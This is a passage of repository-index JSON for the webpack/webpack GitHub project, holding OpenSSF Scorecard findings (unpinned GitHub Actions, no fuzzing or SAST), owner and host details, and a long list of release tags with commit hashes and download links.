https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/ta